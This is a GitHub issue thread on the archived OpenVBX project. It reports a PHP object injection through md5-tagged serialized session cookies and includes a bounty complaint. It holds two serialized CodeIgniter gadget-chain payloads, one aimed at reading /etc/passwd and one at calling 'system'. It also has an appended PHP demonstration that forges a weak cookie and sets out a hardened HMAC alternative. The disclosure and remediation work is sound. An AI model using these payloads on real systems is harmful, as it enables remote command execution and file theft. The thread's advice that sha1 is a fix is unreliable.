This repository has been archived by the owner on Mar 4, 2021. It is now read-only.

Php Object Injection #439

Open
devcoinfet opened this issue Jul 5, 2019 · 1 comment

devcoinfet commented Jul 5, 2019

1.) function sess_destroy()
2.) function _set_cookie($cookie_data = NULL)

https://github.com/twilio/OpenVBX/blob/7ed912adfc80aa7c5294cc47ebefb11b91ca6c6f/system/libraries/Session.php

Both make calls to a serialize function that appears controllable with a payload like this:

attack_one = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":5:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:3:"cat";}}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:11:"/etc/passwd";}}"""

attack_two = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":5:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:6:"system";}}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:2:"id";}}"""

Not exact and may need tweaking, just examples.

========================================================================
#Impact
#Encryption is off by default. You are using what appears to be an md5 to verify the data was not modified, like a CSRF token.
#What happens is you call _unserialize and for some reason decide to overload an insecure function by not securing it but just checking it,
#then deciding to add an md5 to the end to verify it isn't tainted. Well, with the original request intercepted we can now sign the md5
#and attempt to execute a PHP object injection attack.

#Suggestions
#Never use a collidable hash like md5 to generate a nonce.
#Use something like sha1 and try to implement encryption by default with a random seed, and make it different for all.
#Never store critical data client side in an effort to save yourself resources like you guys did with OpenVBX,
#and never trust any data that is provided by a user, ever.

protected function _serialize($data)
{
    if (!is_scalar($data))
    {
        // -> right here you're overloading an insecure function with an insecure function in PHP; this is very dangerous
        $data = serialize($data);
    }
    return $data;
}

Also, kindly tell me why this was rejected as a paying bounty on Bugcrowd for me, and it's an RCE against one of your products with 200 plus customers?

FYI, your Bugcrowd team also said they weren't patching it. Is this standard practice, to not pay for RCE bounties when customers are using it? I'm confused, as well as: at least patch it. I mean, you guys completely hid the fact I even reported it since it didn't fall under your program; I am legally able to call you out on it here in front of your customers.

I am not trying to be rude etc., but I do what I do and barely get paid for it. I don't take kindly to companies saying we're not patching it and we're not paying and we could care less. People like me do care. You have 200 customers out there possibly vulnerable, and this was completely dismissed, and in fact it could be very serious.
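As an added example (not OpenVBX or CodeIgniter code, and not part of the report above), the following PHP models the pattern the comment describes: a session cookie built from serialize() output with an md5 tag appended, read back through unserialize(), placed next to the same cookie done with JSON plus an HMAC. The DemoGadget class, the cookie layout, the function names and the empty default key are assumptions made for the demonstration; DemoGadget only records that its __wakeup() ran and is not a real gadget chain.

```php
<?php
// Added example, not OpenVBX/CodeIgniter code. Models the weak
// "serialize() + trailing md5" cookie scheme described in the issue
// next to a hardened equivalent. Names and key handling are assumptions.

// Stand-in gadget: a class with a magic method that runs on unserialize().
// It only records that it fired; a real chain would reach a dangerous sink.
class DemoGadget
{
    public static $fired = 0;
    public $note = 'constructed example';
    public function __wakeup()          // invoked automatically by unserialize()
    {
        self::$fired++;
    }
}

// ---- weak scheme (the pattern the issue describes) -------------------------
// cookie = serialize($data) . md5(serialize($data) . $key)
// With $key empty (assumed default config here) the tag needs no secret.
function weak_make_cookie(array $data, string $key = ''): string
{
    $body = serialize($data);
    return $body . md5($body . $key);
}

function weak_read_cookie(string $cookie, string $key = ''): ?array
{
    $hash = substr($cookie, -32);
    $body = substr($cookie, 0, -32);
    if ($hash !== md5($body . $key)) {
        return null;                     // tampered, or a different key
    }
    return unserialize($body);           // SINK: attacker-chosen classes are instantiated
}

// Attacker side: forge a cookie carrying an object the server never intended.
function forge_weak_cookie(string $key = ''): string
{
    $body = serialize(['user_data' => new DemoGadget()]);
    return $body . md5($body . $key);    // same public recipe, no secret needed
}

// ---- hardened scheme -------------------------------------------------------
// JSON carries no class names, the HMAC needs the secret, and hash_equals()
// compares in constant time. Decoding yields arrays only, so no magic methods run.
function safe_make_cookie(array $data, string $key): string
{
    $body = json_encode($data, JSON_THROW_ON_ERROR);
    return $body . '.' . hash_hmac('sha256', $body, $key);
}

function safe_read_cookie(string $cookie, string $key): ?array
{
    $dot = strrpos($cookie, '.');        // hex tag contains no '.', so the last one splits body/tag
    if ($dot === false) {
        return null;
    }
    $body = substr($cookie, 0, $dot);
    $tag  = substr($cookie, $dot + 1);
    if (!hash_equals(hash_hmac('sha256', $body, $key), $tag)) {
        return null;
    }
    return json_decode($body, true, 512, JSON_THROW_ON_ERROR);
}

// ---- demo ------------------------------------------------------------------
$forged = forge_weak_cookie();
$result = weak_read_cookie($forged);
printf("weak scheme: accepted=%s gadget_fired=%d\n",
    $result !== null ? 'yes' : 'no', DemoGadget::$fired);

$key  = random_bytes(32);                // per-deployment secret, never empty
$good = safe_make_cookie(['user_id' => 42], $key);
var_dump(safe_read_cookie($good, $key));
$tampered = substr_replace($good, '43', strpos($good, '42'), 2);
var_dump(safe_read_cookie($tampered, $key));
```

Run it with `php example.php`: the forged cookie passes the md5 check and DemoGadget::__wakeup() fires before the application ever inspects the data, while the tampered JSON cookie is rejected before decoding. Where unserialize() cannot be removed outright, `unserialize($body, ['allowed_classes' => false])` (PHP 7.0+) turns any object in the payload into __PHP_Incomplete_Class and stops magic methods from running, but a keyed MAC over the body is still needed to detect tampering.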

devcoinfet (Author) commented

I am actually seeing far more than those two that I think are controllable sinks. I am requesting you guys do a review of your code and let me know if this is exploitable. Me and a friend are setting up a lab to find out, but either way your customers need to know this is possibly wrong.
